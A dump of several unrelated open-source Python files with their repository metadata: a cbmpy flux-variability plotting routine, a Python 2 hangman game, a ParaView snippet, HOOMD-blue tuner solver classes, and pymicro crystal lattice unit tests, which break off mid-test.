- *fluxval* [default=True] plot the flux value
- *type* [default='png'] the output format, depends on matplotlib backend e.g. 'png', 'pdf', 'eps'
"""
assert _HAVE_MATPLOTLIB_, "\nPlotting requires Matplotlib"
l_cntr = 0
c_width = 0.8
g_bars = []
g_bars_lcorner = []
fba_val_lines = []
vResults = {}
PLOTLOG = False
outputNames = []
Ymagic = []
FIG = matplotlib.pyplot.figure(num=5, figsize=(16, 9))
pyplot.hold(True)
for r in range(fva_data.shape[0]):
HASMIN = False
HASMAX = False
if roundec == None:
fv_min = fva_data[r, 2]
fv_fba = fva_data[r, 0]
fv_max = fva_data[r, 3]
else:
fv_min = round(fva_data[r, 2], roundec)
fv_fba = round(fva_data[r, 0], roundec)
fv_max = round(fva_data[r, 3], roundec)
if fv_fba != numpy.NaN:
if fv_min != numpy.NaN:
if fv_min < fv_fba:
HASMIN = True
if fv_max != numpy.NaN:
if fv_max > fv_fba:
HASMAX = True
b_height = 0.0
b_height1 = 0.0
b_height2 = 0.0
if HASMAX:
b_height1 = fv_max - fv_fba
if HASMIN:
b_height2 = fv_fba - fv_min
b_height = abs(b_height1) + abs(b_height2)
HCheckMin = False
HCheckMax = False
if minHeight == None:
HCheckMin = True
elif minHeight != None and b_height >= minHeight:
HCheckMin = True
if maxHeight == None:
HCheckMax = True
elif maxHeight != None and b_height <= maxHeight:
HCheckMax = True
if b_height > 0.0 and HCheckMin and HCheckMax:
outputNames.append(fva_names[r])
if HASMIN:
bottom = fv_min
else:
bottom = fv_fba
Ymagic.append(bottom)
Ymagic.append(bottom + b_height)
# print 'Bar = (%s,%s)' % (bottom, bottom+b_height)
g_bars.append(
matplotlib.pyplot.bar(
left=l_cntr,
height=b_height,
width=c_width,
bottom=bottom,
log=PLOTLOG,
hold=True,
)
)
if fluxval:
fba_val_lines.append(
matplotlib.pyplot.hlines(
fv_fba,
g_bars[-1][0].get_x(),
g_bars[-1][0].get_x() + g_bars[-1][0].get_width(),
colors='r',
linestyles='solid',
lw=2,
)
)
g_bars_lcorner.append(l_cntr)
l_cntr += c_width
vResults.update({fva_names[r]: fva_data[r].copy()})
elif b_height > 0.0 and HCheckMin:
outputNames.append(fva_names[r])
if HASMIN:
bottom = fv_min
else:
bottom = fv_fba
if bottom < fv_fba - maxHeight:
bottom = fv_fba - maxHeight
if bottom + b_height > fv_fba + maxHeight:
b_height = abs(fv_fba - bottom) + maxHeight
Ymagic.append(bottom)
Ymagic.append(bottom + b_height)
# print 'Bar = (%s,%s)' % (bottom, bottom+b_height)
g_bars.append(
matplotlib.pyplot.bar(
left=l_cntr,
height=b_height,
width=c_width,
bottom=bottom,
log=PLOTLOG,
hold=True,
color='y',
lw=0.5,
)
)
if fluxval:
fba_val_lines.append(
matplotlib.pyplot.hlines(
fv_fba,
g_bars[-1][0].get_x(),
g_bars[-1][0].get_x() + g_bars[-1][0].get_width(),
colors='r',
linestyles='solid',
lw=2,
)
)
g_bars_lcorner.append(l_cntr)
l_cntr += c_width
vResults.update({fva_names[r]: fva_data[r].copy()})
if __DEBUG__:
print('len fva_names', len(fva_names))
if __DEBUG__:
print('len g_bars', len(g_bars))
# print 'fva_data.shape', fva_data.shape
outputNames = [l.replace('_LPAREN_e_RPAREN_', '_e') for l in outputNames]
matplotlib.pyplot.xticks(
numpy.array(g_bars_lcorner) + (c_width / 2.0),
outputNames,
rotation='vertical',
size='xx-small',
)
if title == None:
matplotlib.pyplot.title('%s has %i varying fluxes' % (fname, len(g_bars)))
else:
matplotlib.pyplot.title('%s' % (title))
matplotlib.pyplot.ylabel('Variability')
if len(Ymagic) > 0:
yhi = max(Ymagic) + 0.01 * max(Ymagic)
ylow = min(Ymagic) - abs(0.01 * min(Ymagic))
if ySlice != None:
yhi = abs(ySlice)
ylow = -abs(ySlice)
matplotlib.pyplot.ylim(ylow, yhi)
if __DEBUG__:
print('Plotting y %s --> %s' % (ylow, yhi))
if work_dir != None:
fname = os.path.join(work_dir, fname)
matplotlib.pyplot.savefig(fname + '.%s' % type)
pyplot.hold(False)
if autoclose:
matplotlib.pyplot.close('all')
| SystemsBioinformatics/cbmpy | cbmpy/CBPlot.py | Python | gpl-3.0 | 8,194 | [
"PySCeS"
] | 00cfcb3d85e1a46f62bbb42f92cad2f0b85fa373c67b0eac6ba4bfbdcaff66bb |
import random
HANGMANPICS = ['''
+---+
| |
|
|
|
|
======''','''
+---+
| |
O |
|
|
|
======''','''
+---+
| |
O |
| |
|
|
======''','''
+---+
| |
O |
/| |
|
|
======''','''
+---+
| |
O |
/|\ |
|
|
======''','''
+---+
| |
O |
/|\ |
/ |
|
======''','''
+---+
| |
O |
/|\ |
/ \ |
|
======''']
#These words were shamelessly stolen from:
# https://answers.yahoo.com/question/index?qid=20080510101849AAN28jL
words = 'abruptly affix askew axiom azure bagpipes bandwagon banjo \
bayou bikini blitz bookworm boxcar boxful buckaroo buffalo buffoon \
cobweb croquet daiquiri disavow duplex dwarves equip exodus fishhook fixable \
foxglove galaxy galvanize gazebo gizmo glowworm guffaw haiku haphazard hyphen \
icebox injury ivory ivy jaundice jawbreaker jaywalk jazzy jigsaw jiujitsu jockey \
jovial joyful juicy jumbo kazoo keyhole khaki kilobyte kiosk kiwifruit knapsack \
larynx luxury marquis megahertz microwave mystify nightclub nowadays numbskull \
ovary oxidize oxygen pajama peekaboo pixel pizazz pneumonia polka quartz quiz \
quorum razzmatazz rhubarb rickshaw schizophrenia sphinx spritz squawk subway \
swivel topaz unknown unworthy unzip uptown vaporize vixen vodka vortex walkway \
waltz wavy waxy wheezy whiskey whomever wimpy wizard woozy xylophone yachtsman \
yippee youthful zephyr zigzag zilch zodiac zombie'.split()
def get_random_word(word_list):
return random.choice(word_list)
def display_board(HANGMANPICS, missed_letters,
correct_letters, secret_word):
print HANGMANPICS[len(missed_letters)]
print
print 'Missed letters:',
for letter in missed_letters:
print letter,
print
for letter in secret_word:
if letter in correct_letters:
print letter,
else:
print '_',
print
#Write a function called get_guess(already_guessed).
#It will take as input a string of already guessed letters.
#Ask the user to type in a letter.
#Make sure that the following things are True:
#1. If they enter more than one letter, tell them to enter a single letter
#2. If they enter an already guessed letter, tell them to pick a different one.
#3. If they pick something that is NOT A LETTER, tell them to pick a letter!
#Hint: The function .isalpha() will help you here.
#Loop until they pick something that is valid, then return that letter.
def get_guess(already_guessed):
while True:
guess = raw_input('Please guess a letter: ').lower()
if len(guess) > 1:
print 'Please guess only a SINGLE letter.'
elif guess in already_guessed:
print 'Please guess a letter that hasn\'t been already guessed.'
#elif guess.isalpha() == False:
elif not guess.isalpha():
print 'Please guess a LETTER!'
else:
return guess
#Will return True or False depending on whether they want to play again
def play_again():
answer = raw_input("Do you want to play again (yes/no)? ")
return answer.lower().startswith('y')
###################################################################################################
def main():
print 'H A N G M A N'
missed_letters = ''
correct_letters = ''
secret_word = get_random_word(words) #GET THE RANDOM WORD
game_is_done = False #This is called a flag variable
while True:
display_board(HANGMANPICS, missed_letters,
correct_letters, secret_word)
guess = get_guess(missed_letters + correct_letters)
#CHECK IF THE GUESS IS CORRECT
if guess in secret_word:
correct_letters += guess
#CHECK TO SEE IF I HAVE WON!
found_all_letters = True
for letter in secret_word:
if letter not in correct_letters:
found_all_letters = False
break
if found_all_letters:
print 'Yes! The secret word was {}! You have won.'.format(secret_word)
game_is_done = True
#CHECK TO SEE IF THE GUESS IS INCORRECT
else:
missed_letters += guess
#CHECK TO SEE IF I HAVE LOST
if len(missed_letters) >= 6:
display_board(HANGMANPICS, missed_letters,
correct_letters, secret_word)
print 'You lost! The secret word was {}!'.format(secret_word)
game_is_done = True
if game_is_done:
if play_again():
#RESET THE GAME
missed_letters = ''
correct_letters = ''
secret_word = get_random_word(words)
game_is_done = False
else:
print 'Have a wonderful day!'
break
main()
| Nethermaker/school-projects | intro/hangman.py | Python | mit | 5,211 | [
"Galaxy"
] | 795d4bf165d8f6e7320ebb849be7299eb2c11e87324e2e4692c91b634ad2e2eb |
try: paraview.simple
except: from paraview.simple import *
paraview.simple._DisableFirstRenderCameraReset()
GraphToPolyData()
| jeromevelut/Peavip | Testing/GraphToPolyData.py | Python | gpl-3.0 | 128 | [
"ParaView"
] | df0612cc86a1f71e8af2eab063c55a991483ebde6f23ebc1a5850a0e19a86a55 |
# Copyright (c) 2009-2021 The Regents of the University of Michigan
# This file is part of the HOOMD-blue project, released under the BSD 3-Clause
# License.
"""Implement tuner utility classes."""
from math import isclose
from abc import ABCMeta, abstractmethod
class _TuneDefinition(metaclass=ABCMeta):
"""Internal class for defining y = f(x) relations.
This class is designed to allow for tuning x to achieve a specified value
for y over a domain T. It abstracts over getting and setting x and getting
y. The class also provides helper functions for ensuring x is always set to
a value within the specified domain.
"""
def __init__(self, target, domain=None):
self.domain = domain
self._target = target
def in_domain(self, value):
"""Check whether a value is in the domain.
Args:
value (``any``): A value that can be compared to the minimum and
maximum of the domain.
Returns:
bool: Whether the value is in the domain of x.
"""
if self.domain is None:
return True
else:
lower_bound, upper_bound = self.domain
return ((lower_bound is None or lower_bound <= value)
and (upper_bound is None or value <= upper_bound))
def clamp_into_domain(self, value):
"""Return the closest value within the domain.
Args:
value (``any``): A value of the same type as x.
Returns:
The value clamps within the domains of x. Clamping here refers to
returning the value or minimum or maximum of the domain if value is
outside the domain.
"""
if self._domain is None:
return value
else:
lower_bound, upper_bound = self.domain
if lower_bound is not None and value < lower_bound:
return lower_bound
elif upper_bound is not None and value > upper_bound:
return upper_bound
else:
return value
@property
def x(self):
"""The dependent variable.
Can be set. When set the setting value is clamped within the provided
domain. See `clamp_into_domain` for further explanation.
"""
return self._get_x()
@x.setter
def x(self, value):
return self._set_x(self.clamp_into_domain(value))
@property
def max_x(self):
"""Maximum allowed x value."""
if self.domain is None:
return None
else:
return self.domain[1]
@property
def min_x(self):
"""Minimum allowed y value."""
if self.domain is None:
return None
else:
return self.domain[0]
@property
def y(self):
"""The independent variable, and is unsettable."""
return self._get_y()
@property
def target(self):
"""The targetted y value, can be set."""
return self._get_target()
@target.setter
def target(self, value):
self._set_target(value)
@abstractmethod
def _get_x(self):
pass
@abstractmethod
def _set_x(self):
pass
@abstractmethod
def _get_y(self):
pass
def _get_target(self):
return self._target
def _set_target(self, value):
self._target = value
@property
def domain(self):
"""tuple[``any``, ``any``]: A tuple pair of the minimum and maximum \
accepted values of x.
When, the domain is ``None`` then any value of x is accepted. Either
the minimum or maximum can be set to ``None`` as well which means
there is no maximum or minimum. The domain is used to wrap values
within the specified domain when setting x.
"""
if self._domain is not None:
return tuple(self._domain)
else:
return None
@domain.setter
def domain(self, value):
if value is not None and not len(value) == 2:
raise ValueError("domain must be a sequence of length two.")
self._domain = value
def __hash__(self):
raise NotImplementedError("This object is not hashable.")
def __eq__(self, other):
raise NotImplementedError("This object is not equatable.")
class ManualTuneDefinition(_TuneDefinition):
"""Class for defining y = f(x) relationships for tuning x for a set y \
target.
This class is made to be used with `SolverStep` subclasses.
Here y represents a dependent variable of x. In general, x and y should be
of type `float`, but specific `SolverStep` subclasses may accept
other types.
A special case for the return type of y is ``None``. If the value is
currently inaccessible or would be invalid, a `ManualTuneDefinition` object
can return a y of ``None`` to indicate this. `SolverStep` objects will
handle this automatically. Since we check for ``None`` internally in
`SolverStep` objects, a `ManualTuneDefinition` object's ``y`` property
should be consistant when called multiple times within a timestep.
Args:
get_y (``callable``): A callable that gets the current value for y.
target (``any``): The target y value to approach.
get_x (``callable``): A callable that gets the current value for x.
set_x (``callable``): A callable that sets the current value for x.
domain (`tuple` [``any``, ``any``], optional): A tuple pair of the
minimum and maximum accepted values of x, defaults to `None`. When,
the domain is `None` then any value of x is accepted. Either the
minimum or maximum can be set to `None` as well which means there is
no maximum or minimum. The domain is used to wrap values within the
specified domain when setting x.
Note:
Placing domain restrictions on x can lead to the target y value being
impossible to converge to. This will lead to the `SolverStep` object
passed this tunable to never finish solving regardless if all other
`ManualTuneDefinition` objects are converged.
"""
def __init__(self, get_y, target, get_x, set_x, domain=None):
self._user_get_x = get_x
self._user_set_x = set_x
self._user_get_y = get_y
self._target = target
if domain is not None and not len(domain) == 2:
raise ValueError("domain must be a sequence of length two.")
self._domain = domain
def _get_x(self):
return self._user_get_x()
def _set_x(self, value):
return self._user_set_x(value)
def _get_y(self):
return self._user_get_y()
def _get_target(self):
return self._target
def _set_target(self, value):
self._target = value
def __hash__(self):
"""Compute a hash of the tune definition."""
return hash((self._user_get_x, self._user_set_x, self._user_get_y,
self._target))
def __eq__(self, other):
"""Test for equality."""
return (self._user_get_x == other._user_get_x
and self._user_set_x == other._user_set_x
and self._user_get_y == other._user_get_y
and self._target == other._target)
class SolverStep(metaclass=ABCMeta):
"""Abstract base class for "solving" stepwise equations of f(x) = y.
Requires a single method `SolverStep.solve_one` that steps forward one
iteration in solving the given variable relationship. Users can use
subclasses of this with `hoomd.tune.ManualTuneDefinition` to tune attributes
with a functional relation.
Note:
A `SolverStep` object requires manual iteration to converge. This is to
support the use case of measuring quantities that require running the
simulation for some amount of time after one iteration before
remeasuring the dependent variable (i.e. the y). `SolverStep` object can
be used in `hoomd.custom.Action` subclasses for user defined tuners and
updaters.
"""
@abstractmethod
def solve_one(self, tunable):
"""Takes in a tunable object and attempts to solve x for a specified y.
Args:
tunable (`hoomd.tune.ManualTuneDefinition`): A tunable object that
represents a relationship of f(x) = y.
Returns:
bool : Whether or not the tunable converged to the target.
"""
pass
def _solve_one_internal(self, tunable):
if tunable.y is None:
return False
else:
return self.solve_one(tunable)
def solve(self, tunables):
"""Iterates towards a solution for a list of tunables.
If a y for one of the ``tunables`` is ``None`` then we skip that
``tunable``. Skipping implies that the quantity is not tuned and `solve`
will return `False`.
Args:
tunables (list[`hoomd.tune.ManualTuneDefinition`]): A list of
tunable objects that represent a relationship f(x) = y.
Returns:
bool:
Returns whether or not all tunables were considered tuned by
the object.
"""
# Need to convert tuning results to a list first to ensure we don't
# short circuit in all.
return all([self._solve_one_internal(tunable) for tunable in tunables])
class ScaleSolver(SolverStep):
"""Solves equations of f(x) = y using a ratio of the current y with the \
target.
Args:
max_scale (`float`, optional): The maximum amount to scale the
current x value with, defaults to 2.0.
gamma (`float`, optional): nonnegative real number used to dampen
or increase the rate of change in x. ``gamma`` is added to the
numerator and denominator of the ``y / target`` ratio. Larger values
of ``gamma`` lead to smaller changes while a ``gamma`` of 0 leads to
scaling x by exactly the ``y / target`` ratio.
correlation (`str`, optional): Defines whether the relationship
between x and y is of a positive or negative correlation, defaults
to 'positive'. This determines which direction to scale x in for a
given y.
tol (`float`, optional): The absolute tolerance for convergence of
y, defaults to 1e-5.
Note:
This solver is only usable when quantities are strictly positive.
"""
def __init__(self,
max_scale=2.0,
gamma=2.0,
correlation='positive',
tol=1e-5):
self.max_scale = max_scale
self.gamma = gamma
self.correlation = correlation.lower()
self.tol = tol
def solve_one(self, tunable):
"""Solve one step."""
x, y, target = tunable.x, tunable.y, tunable.target
if abs(y - target) <= self.tol:
return True
if y > 0:
if self.correlation == 'positive':
scale = (self.gamma + target) / (y + self.gamma)
else:
scale = (y + self.gamma) / (self.gamma + target)
else:
# y was zero. Try a value an order of magnitude smaller
if self.correlation == 'positive':
scale = 0.1
else:
scale = 1.1
if (scale > self.max_scale):
scale = self.max_scale
# Ensures we stay within the tunable's domain (i.e. we don't take on
# values to high or low).
tunable.x = tunable.clamp_into_domain(scale * x)
return False
def __eq__(self, other):
"""Test for equality."""
if not isinstance(other, SolverStep):
return NotImplemented
if not isinstance(other, type(self)):
return False
return all(
getattr(self, attr) == getattr(other, attr)
for attr in ('max_scale', 'gamma', 'correlation', 'tol'))
class SecantSolver(SolverStep):
"""Solves equations of f(x) = y using the secant method.
Args:
gamma (`float`, optional): real number between 0 and 1 used to
dampen the rate of change in x. ``gamma`` scales the corrections to
x each iteration. Larger values of ``gamma`` lead to larger changes
while a ``gamma`` of 0 leads to no change in x at all.
tol (`float`, optional): The absolute tolerance for convergence of
y, defaults to 1e-5.
Note:
Tempering the solver with a smaller than 1 ``gamma`` value is crucial
for numeric stability. If instability is found, then lowering ``gamma``
accordingly should help.
"""
_max_allowable_counter = 3
def __init__(self, gamma=0.9, tol=1e-5):
self.gamma = gamma
self._previous_pair = dict()
self.tol = tol
self._counters = dict()
def solve_one(self, tunable):
"""Solve one step."""
# start tuning new tunable
if tunable not in self._previous_pair:
self._initialize_tuning(tunable)
return False
x, y, target = tunable.x, tunable.y, tunable.target
# check for convergence
if abs(y - target) <= self.tol:
return True
old_x, old_f_x = self._previous_pair[tunable]
# Attempt to find the new value of x using the standard secant formula.
# We use f(x) = y - target since this is the root we are searching for.
f_x = y - target
try:
dxdf = (x - old_x) / (f_x - old_f_x)
except ZeroDivisionError: # Implies that y has not changed
# Given the likelihood for use cases in HOOMD that this implies
# a lack of equilibriation of y or too small of a change.
new_x = self._handle_static_y(tunable, x, old_x)
else:
# We can use the secant formula
self._counters[tunable] = 0
new_x = x - (self.gamma * f_x * dxdf)
# We need to check if the new x is essentially the same as the previous.
# If this is the case we should not update the entry in
# `self._previous_pair` as this would prevent all future tunings. To
# compare we must first clamp the value of the new x appropriately.
new_x = tunable.clamp_into_domain(new_x)
if not isclose(new_x, x):
# We only only update x and the previous tunable information when x
# changes. This is to allow for us gracefully handling when y is the
# same multiple times.
tunable.x = new_x
self._previous_pair[tunable] = (x, y - target)
return False
def _initialize_tuning(self, tunable):
"""Called when a tunable is passed for the first time to solver.
Perturbs x to allow for the calculation of df/dx.
"""
x = tunable.x
new_x = tunable.clamp_into_domain(x * 1.1)
if new_x == x:
new_x = tunable.clamp_into_domain(x * 0.9)
if new_x == x:
raise RuntimeError("Unable to perturb x for secant solver.")
tunable.x = new_x
self._previous_pair[tunable] = (x, tunable.y - tunable.target)
def _handle_static_y(self, tunable, x, old_x):
"""Handles when y is constant for multiple calls to solve_one.
We do nothing for the first SecantSolver._max_allowable_counter
consequetive times, but afterwards we attempt to perturb x in the
direction of last change, and reset the counter.
This method is useful to handle y that vary slowly with x (such as move
sizes and acceptance rates for low density HPMC simulations), or cases
where y takes a while to equilibriate.
"""
counter = self._counters.get(tunable, 0) + 1
if counter > self._max_allowable_counter:
# We nudge x in the direction of previous change.
self._counters[tunable] = 0
return tunable.clamp_into_domain(x + ((x - old_x) * 0.5))
else:
self._counters[tunable] = counter
return x
def __eq__(self, other):
"""Test for equality."""
if not isinstance(other, SolverStep):
return NotImplemented
if not isinstance(other, type(self)):
return False
return all(
getattr(self, attr) == getattr(other, attr)
for attr in ('gamma', 'tol', '_counters', '_previous_pair'))
| joaander/hoomd-blue | hoomd/tune/attr_tuner.py | Python | bsd-3-clause | 16,562 | [
"HOOMD-blue"
] | 7691e6988610a836524ddb50a2523396877eac4c440c9fdb72ad2e10f8a98219 |
import unittest
import numpy as np
from math import pi, cos, sin, acos, atan
from pymicro.crystal.lattice import Lattice, CrystallinePhase, Symmetry, HklObject, HklDirection, HklPlane, SlipSystem
class LatticeTests(unittest.TestCase):
def setUp(self):
print('testing the Lattice class')
def test_equality(self):
l1 = Lattice.cubic(0.5)
a = np.array([[0.5, 0., 0.],
[0., 0.5, 0.],
[0., 0., 0.5]])
l2 = Lattice(a, symmetry=Symmetry.cubic)
self.assertEqual(l1, l2)
def test_cubic(self):
a = np.array([[0.5, 0., 0.],
[0., 0.5, 0.],
[0., 0., 0.5]])
l = Lattice.cubic(0.5)
for i in range(0, 3):
for j in range(0, 3):
self.assertEqual(l.matrix[i][j], a[i][j])
def test_volume(self):
l = Lattice.cubic(0.5)
self.assertAlmostEqual(l.volume(), 0.125)
def test_from_symbol(self):
al = Lattice.from_symbol('Al')
for i in range(0, 3):
self.assertAlmostEqual(al._lengths[i], 0.40495, 4)
self.assertEqual(al._angles[i], 90.0)
def test_reciprocal_lattice(self):
Mg2Si = Lattice.from_parameters(1.534, 0.405, 0.683, 90., 106., 90., x_aligned_with_a=False)
[astar, bstar, cstar] = Mg2Si.reciprocal_lattice()
self.assertAlmostEqual(astar[0], 0.678, 3)
self.assertAlmostEqual(astar[1], 0., 3)
self.assertAlmostEqual(astar[2], 0., 3)
self.assertAlmostEqual(bstar[0], 0., 3)
self.assertAlmostEqual(bstar[1], 2.469, 3)
self.assertAlmostEqual(bstar[2], 0., 3)
self.assertAlmostEqual(cstar[0], 0.420, 3)
self.assertAlmostEqual(cstar[1], 0., 3)
self.assertAlmostEqual(cstar[2], 1.464, 3)
class CrystallinePhaseTests(unittest.TestCase):
def setUp(self):
print('testing the CrystallinePhase class')
def test_init(self):
phase = CrystallinePhase(name='test')
self.assertEqual(phase.phase_id, 1)
self.assertEqual(phase.name, 'test')
class HklDirectionTests(unittest.TestCase):
def setUp(self):
print('testing the HklDirection class')
def test_angle_between_directions(self):
d111 = HklDirection(1, 1, 1)
d110 = HklDirection(1, 1, 0)
d100 = HklDirection(1, 0, 0)
dm111 = HklDirection(-1, 1, 1)
self.assertAlmostEqual(d100.angle_with_direction(d110) * 180 / np.pi, 45.0)
self.assertAlmostEqual(d111.angle_with_direction(d110) * 180 / np.pi, 35.26, 2)
self.assertAlmostEqual(d111.angle_with_direction(dm111) * 180 / np.pi, 70.528, 2)
def test_tetragonal_direction(self):
bct = Lattice.body_centered_tetragonal(0.28, 0.40)
d111 = HklDirection(1, 1, 1, bct)
d110 = HklDirection(1, 1, 0, bct)
self.assertAlmostEqual(d111.direction()[0], 0.49746834, 5)
self.assertAlmostEqual(d111.direction()[1], 0.49746834, 5)
self.assertAlmostEqual(d111.direction()[2], 0.71066905, 5)
self.assertAlmostEqual(d110.direction()[0], 0.707106781, 5)
self.assertAlmostEqual(d110.direction()[1], 0.707106781, 5)
self.assertAlmostEqual(d110.direction()[2], 0.0, 5)
def test_tetragonal_direction2(self):
ZrO2 = Lattice.tetragonal(0.364, 0.527)
d = HklDirection(1, 1, 1, ZrO2)
target = np.array([1., 1., 1.448])
target /= np.linalg.norm(target)
self.assertAlmostEqual(d.direction()[0], target[0], 4)
self.assertAlmostEqual(d.direction()[1], target[1], 4)
self.assertAlmostEqual(d.direction()[2], target[2], 4)
def test_angle_with_directions(self):
(a, b, c) = (1.022, 0.596, 0.481)
olivine = Lattice.orthorhombic(a, b, c)
(h1, k1, l1) = (1., 1., 1.)
(h2, k2, l2) = (3., 3., 2.)
d1 = HklDirection(h1, k1, l1, olivine)
d2 = HklDirection(h2, k2, l2, olivine)
# compare with formula in orthorhombic lattice, angle must be 6.589 degrees
angle = np.arccos(((h1 * h2 * a ** 2) + (k1 * k2 * b ** 2) + (l1 * l2 * c ** 2)) /
(np.sqrt(a ** 2 * h1 ** 2 + b ** 2 * k1 ** 2 + c ** 2 * l1 ** 2) *
np.sqrt(a ** 2 * h2 ** 2 + b ** 2 * k2 ** 2 + c ** 2 * l2 ** 2)))
self.assertAlmostEqual(d1.angle_with_direction(d2), angle)
def test_skip_higher_order(self):
uvw = HklDirection(3, 3, 1)
hkl_planes = uvw.find_planes_in_zone(max_miller=3)
self.assertEqual(len(hkl_planes), 18)
hkl_planes2 = HklObject.skip_higher_order(hkl_planes)
self.assertEqual(len(hkl_planes2), 7)
def test_4indices_representation(self):
u, v, w = HklDirection.four_to_three_indices(2, -1, -1, 0)
self.assertEqual(u, 1)
self.assertEqual(v, 0)
self.assertEqual(w, 0)
u, v, w = HklDirection.four_to_three_indices(1, 0, -1, 1)
self.assertEqual(u, 2)
self.assertEqual(v, 1)
self.assertEqual(w, 1)
U, V, T, W = HklDirection.three_to_four_indices(1, 1, 1)
self.assertEqual(U, 1)
self.assertEqual(V, 1)
self.assertEqual(T, -2)
self.assertEqual(W, 3)
U, V, T, W = HklDirection.three_to_four_indices(2, 1, 0)
self.assertEqual(U, 1)
self.assertEqual(V, 0)
self.assertEqual(T, -1)
self.assertEqual(W, 0)
class HklPlaneTests(unittest.TestCase):
def setUp(self):
print('testing the HklPlane class')
self.hex = Lattice.hexagonal(0.2931, 0.4694) # nm
def test_equality(self):
p1 = HklPlane(1, 1, 1)
p2 = HklPlane(1, 1, 1)
p3 = HklPlane(-1, 1, 1)
self.assertEqual(p1, p2)
self.assertTrue(p1 == p2)
self.assertTrue(p1 != p3)
def test_HklPlane(self):
p = HklPlane(1, 1, 1)
n = p.normal()
self.assertEqual(np.linalg.norm(n), 1)
def test_get_family(self):
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.cubic)), 3)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 6)
self.assertEqual(len(HklPlane.get_family('111', crystal_structure=Symmetry.cubic)), 4)
self.assertEqual(len(HklPlane.get_family('111', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family('011', crystal_structure=Symmetry.cubic)), 6)
self.assertEqual(len(HklPlane.get_family('011', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 12)
self.assertEqual(len(HklPlane.get_family('112', crystal_structure=Symmetry.cubic)), 12)
self.assertEqual(len(HklPlane.get_family('112', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 24)
self.assertEqual(len(HklPlane.get_family('123', crystal_structure=Symmetry.cubic)), 24)
self.assertEqual(len(HklPlane.get_family('123', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 48)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.tetragonal)), 1)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 2)
self.assertEqual(len(HklPlane.get_family('010', crystal_structure=Symmetry.tetragonal)), 2)
self.assertEqual(len(HklPlane.get_family('010', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 4)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.tetragonal)), 2)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 4)
self.assertEqual(len(HklPlane.get_family([1, 0, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family([-1, 0, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family([0, 1, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family([0, -1, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.hexagonal)), 1)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 2)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.hexagonal)), 3)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 6)
self.assertEqual(len(HklPlane.get_family((1, 0, -1, 0), crystal_structure=Symmetry.hexagonal)), 3)
self.assertEqual(len(HklPlane.get_family((1, 0, -1, 0), crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 6)
self.assertEqual(len(HklPlane.get_family('102', crystal_structure=Symmetry.hexagonal)), 6)
self.assertEqual(len(HklPlane.get_family('102', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 12)
def test_multiplicity(self):
"""Int Tables of Crystallography Vol. 1 p 32."""
self.assertEqual(HklPlane(1, 0, 0).multiplicity(symmetry=Symmetry.cubic), 6)
for h in range(1, 4):
self.assertEqual(HklPlane(h, 0, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(0, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(h, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(-h, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(h, h, 1).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(-h, h, 1).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(0, 0, 1).multiplicity(symmetry=Symmetry.tetragonal), 2)
self.assertEqual(HklPlane(1, 0, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(-1, 0, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(0, 1, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(0, -1, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(1, 2, 0).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(-1, 2, 0).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(1, 2, 3).multiplicity(symmetry=Symmetry.tetragonal), 16)
def test_HklPlane_normal(self):
ZrO2 = Lattice.tetragonal(3.64, 5.27)
p = HklPlane(1, 1, 1, ZrO2)
n = p.normal()
self.assertAlmostEqual(n[0], 0.635, 3)
self.assertAlmostEqual(n[1], 0.635, 3)
self.assertAlmostEqual(n[2], 0.439, 3)
def test_110_normal_monoclinic(self):
"""Testing (110) plane normal in monoclinic crystal structure.
This test comes from
http://www.mse.mtu.edu/~drjohn/my3200/stereo/sg5.html
corrected for a few errors in the html page.
In this test, the lattice is defined with the c-axis aligned with the Z direction of the Cartesian frame.
"""
Mg2Si = Lattice.from_parameters(1.534, 0.405, 0.683, 90., 106., 90., x_aligned_with_a=False)
a = Mg2Si.matrix[0]
b = Mg2Si.matrix[1]
c = Mg2Si.matrix[2]
self.assertAlmostEqual(a[0], 1.475, 3)
self.assertAlmostEqual(a[1], 0., 3)
self.assertAlmostEqual(a[2], -0.423, 3)
self.assertAlmostEqual(b[0], 0., 3)
